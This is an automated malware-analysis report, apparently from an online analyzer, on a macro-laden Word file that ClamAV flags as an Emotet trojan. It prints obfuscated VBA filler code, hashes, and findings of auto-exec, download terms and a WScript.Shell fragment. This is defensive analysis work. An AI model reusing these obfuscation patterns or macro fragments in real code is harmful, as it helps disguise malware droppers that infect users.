t17X4FN32O = "OonW;[2ezUk:F#6 .ET;td$sy2Eg:eHc*d< AlF[M$3T@sQNq??126i[6JS [7XFPAzhmz7hSNLAbR*@C#e[gMyM [#pZEQe$@K "
nS9W8zpbT = "]bnBxKyrI$<hbnO,ba S2u*] 6Fs8DaF71?kAm]ph9L#Ruu f8^hq2$OY:M!EnOkD dX0FzLMCW*;E @%NaQhctf0XRRFu:A UiJ"
Pw83X23xNMF = "fnP9sP [s?%XB* WPKs9ADhy2LHN<UHPd1%3cfaFL7S.jY3T82P*j. d6fFey8Zk@S<Q:oCG%]xINJULyLT#Iq lyKw#lOo@Qbj*"
d9Kz2 = "..Dj^WQEugYbYD*.bkG*nDgsb,J sO#lREOe?dfyHd%,9o[F!<e8 7xLgLnNGqGXe i*F#wz9*PoZYq iG11g@QSWnn@.?I$c%gh"
j15B72zT = "Z0<ymby!g!]mAYK8m9,Z @a%2OI;*MngQuwFZFZ:9pwAquYmn;S,263K$iOmnI:L,FIF1mMQ?UiEmzY6seS nlts*N]z@.qCh*u7"
Y6j3010z0N2 = Y6j3010z0N2 & Pw83X23xNMF
Pw83X23xNMF = t17X4FN32O & e44k1394c
t17X4FN32O = d9Kz2 & nS9W8zpbT
Y6j3010z0N2 = d9Kz2 & e44k1394c
j15B72zT = Y6j3010z0N2 & d9Kz2
Y6j3010z0N2 = d9Kz2 & e44k1394c
e44k1394c = j15B72zT & Pw83X23xNMF

Dim M0W5m, c65u31bHo, C1P9C, Bk172l, Gq7wNt0, F10iyFI6E49, jKw2d7X50 As Long
M0W5m = 8356
c65u31bHo = 80026
C1P9C = 1681
Bk172l = 242360
Gq7wNt0 = 7767
F10iyFI6E49 = 1949557
jKw2d7X50 = 9868
F10iyFI6E49 = M0W5m + C1P9C
F10iyFI6E49 = jKw2d7X50 + c65u31bHo
c65u31bHo = c65u31bHo + C1P9C
c65u31bHo = M0W5m + c65u31bHo
Bk172l = Gq7wNt0 + M0W5m
M0W5m = Bk172l + M0W5m
C1P9C = C1P9C + C1P9C
MsgBox "Hi"
End Sub

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{1644B853-222C-4AE2-B1AD-AEE75F617B1C}{B99A0725-F525-4C72-8D1B-3DE1175DCA2F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 120320 bytes
SHA-256: d300ca278a8135a1625de79c1fe421f4071fe03a6a01a1fc9fa034925e428fa4
Detection
ClamAV: Doc.Trojan.Emotet-7178008-0
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 1021 of 1849 identifiers look randomly generated (e.g. 'w7TCoMObw73DucOnKl5bwqtFwpHDksKtA8OkacOo') — consistent with name-mangling obfuscation. Carved artifact contains 97 long base64-like blob(s).
embedded_office_off00002291.ole embedded-office Embedded OLE/CFB Office body inside ooxml container at offset 0x2291 193503 bytes
SHA-256: 170354109562501ca798e0ebdd052d3668295d829a3e14ff326ebca05d01758a
Detection
ClamAV: Doc.Trojan.Emotet-7178008-0
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): WScript.Shell';var eY=b('0xaf','8XxQ');var eZ=b('0xb0','Z47H');var f0=b('0xb1','i0wL');var f1=b('0xb2','nWl[');var f2=b('0xb3','%b*T');var f3='uFA%mh][:ioF\x20]SYg\x20 Carved artifact contains 2 shell/COM execution token(s). Carved macro source contains an auto-exec entry point and execution/download terms.

Open this report in the interactive analyzer, or submit your own file for analysis.